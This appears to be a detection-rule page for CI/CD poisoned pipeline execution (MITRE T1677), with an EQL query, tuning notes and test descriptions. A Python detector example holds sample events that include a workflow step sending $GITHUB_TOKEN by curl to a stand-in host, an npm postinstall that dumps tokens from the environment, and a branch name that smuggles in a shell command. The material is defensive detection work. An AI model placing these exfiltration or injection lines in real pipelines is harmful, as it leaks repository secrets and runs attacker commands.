T1677 Elastic Security · Elastic

Detect Poisoned Pipeline Execution in Elastic Security

This detection identifies adversaries attempting to poison CI/CD pipelines through direct modification of CI configuration files, injection of malicious code into pipeline-referenced build artifacts, or exploitation of fork-based pull request workflows that expose pipeline secrets. Detections span three attack vectors:

  1. Direct pipeline execution — changes to CI config files (e.g., .github/workflows, .gitlab-ci.yml, Jenkinsfile) containing suspicious commands such as credential exfiltration via curl/wget, base64-encoded payloads, or environment variable dumping.
  2. Indirect pipeline execution — modifications to Makefiles, linters, test suites, or build scripts that are invoked by trusted CI configurations.
  3. Public pipeline execution — fork-based pull requests targeting pull_request_target workflows or injecting malicious branch names that are processed as trusted inputs by pipeline steps.

Detection coverage includes Azure DevOps audit logs, GitHub audit log events, and process telemetry from CI runner hosts.

MITRE ATT&CK

Tactic: Execution
Technique: T1677 Poisoned Pipeline Execution
Canonical reference: https://attack.mitre.org/techniques/T1677/

Elastic Detection Query

Platform: Elastic Security
Language: EQL
Severity: high · Confidence: medium

file where event.type in ("creation", "change") and (
  file.path : ("*\\Temp\\*", "*\\AppData\\*", "*\\Downloads\\*") and
  file.extension in ("exe", "dll", "bat", "ps1", "vbs", "hta", "js")
) and not process.code_signature.trusted == true

Elastic EQL detection for Poisoned Pipeline Execution (T1677). The query flags file creation or change events that write an executable or script type (exe, dll, bat, ps1, vbs, hta, js) under a Temp, AppData, or Downloads path from a process without a trusted code signature, which is the endpoint-side footprint of a payload being dropped on a CI runner host by a poisoned pipeline step. The path patterns are Windows-style, so this query covers Windows runner hosts; the source-control activity described above (workflow file edits, fork pull requests) is covered by the audit-log signals listed under Testing Methodology rather than by this query.

Data Sources

Elastic Endpoint Security

Required Tables

logs-endpoint.events.file-*

False Positives & Tuning

  • Legitimate DevOps engineers updating pipeline definitions to add new build steps or integrations — validate against change management tickets
  • Authorized security scanning tools (Snyk, Dependabot, GitHub Advanced Security) modifying workflow files during automated PR creation
  • Infrastructure-as-code pipelines that legitimately use curl/wget to download build dependencies or SDKs from trusted artifact registries

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Direct CI Config Poisoning - GitHub Actions Credential Exfiltration Simulation

    Expected signal: GitHubAuditLog: Action=git.push with repository_file matching .github/workflows path and DataStr containing 'curl' and 'TOKEN'. AzureDevOpsAuditing: OperationName=Git.Push with Data containing workflow file path and suspicious curl command.

  2. Test 2: Indirect Pipeline Poisoning - Malicious npm postinstall Script Injection

    Expected signal: DeviceProcessEvents: InitiatingProcessFileName=npm spawning sh/bash with ProcessCommandLine containing 'printenv'. Sysmon Event ID 1: ParentImage=npm, CommandLine matching printenv/grep pattern. linux_secure or auditd: execve syscall for printenv spawned under npm process.

  3. Test 3: Public Pipeline Execution - Fork PR with Malicious Branch Name Injection

    Expected signal: GitHubAuditLog: Action=pull_request.opened with pull_request.head.repo.full_name != pull_request.base.repo.full_name (fork indicator). Branch name field containing shell metacharacters triggers IsSuspiciousBranch=true in hunting query.
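As an added illustration (not Elastic's rule logic and not a real Elastic or GitHub schema), the following Python scores constructed audit events against the three vectors in the description and the signals expected by the three tests: suspicious content in directly executed CI config files, the same content in indirectly invoked build files, and fork pull requests whose branch name carries shell metacharacters. The event field names and the sample events are assumptions for this example.

```python
import re

# Constructed sample events in a simplified, audit-log-like shape. The field
# names are an assumption for this example, not an Elastic or GitHub schema.
EVENTS = [
    {"action": "git.push", "repository_file": ".github/workflows/ci.yml",
     "data": 'run: curl -d "$GITHUB_TOKEN" https://example.invalid/collect'},
    {"action": "git.push", "repository_file": "Makefile",
     "data": "build:\n\tnpm ci && npm run build"},
    {"action": "git.push", "repository_file": "package.json",
     "data": '"postinstall": "printenv | grep -i token"'},
    {"action": "pull_request.opened", "head_repo": "forker/app",
     "base_repo": "org/app", "branch": "fix;$(id)"},
    {"action": "pull_request.opened", "head_repo": "org/app",
     "base_repo": "org/app", "branch": "feature/login"},
]

# Vector 1: files the CI system executes directly.
CI_CONFIG = re.compile(r"(^|/)(\.github/workflows/[^/]+\.ya?ml|\.gitlab-ci\.yml|Jenkinsfile)$")
# Vector 2: files a trusted CI config invokes (build scripts, manifests, linters).
INDIRECT = re.compile(r"(^|/)(Makefile|package\.json|setup\.py|tox\.ini|\.eslintrc(\.\w+)?)$")
# Content patterns from the description: credential exfil, encoded payloads, env dumps.
SUSPICIOUS = [
    ("credential_exfil", re.compile(r"\b(curl|wget)\b.*\$\{?\w*(TOKEN|SECRET|KEY|PASSWORD)", re.I)),
    ("encoded_payload", re.compile(r"base64\s+(-d|--decode)\b|[A-Za-z0-9+/]{40,}={0,2}")),
    ("env_dump", re.compile(r"\b(printenv|env)\b(?!\s*=)", re.I)),
]
# Vector 3: branch names that carry shell metacharacters into pipeline steps.
SHELL_META = re.compile(r"[;&|`$(){}<>]")


def classify(event):
    """Return (vector, reasons) for one event, or None if it looks benign."""
    if event["action"] == "git.push":
        hits = [name for name, rx in SUSPICIOUS if rx.search(event["data"])]
        if not hits:
            return None
        if CI_CONFIG.search(event["repository_file"]):
            return ("direct", hits)
        if INDIRECT.search(event["repository_file"]):
            return ("indirect", hits)
        return None
    if event["action"] == "pull_request.opened":
        is_fork = event["head_repo"] != event["base_repo"]
        if is_fork and SHELL_META.search(event["branch"]):
            return ("public", ["fork_pr_suspicious_branch"])
    return None


def scan(events):
    """Index, vector and reasons for every event that classify() flags."""
    return [(i, *hit) for i, ev in enumerate(events) if (hit := classify(ev))]
```

Running scan(EVENTS) flags events 0, 2 and 3 as direct, indirect and public pipeline execution respectively, while the plain Makefile change and the same-repository pull request are left alone.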
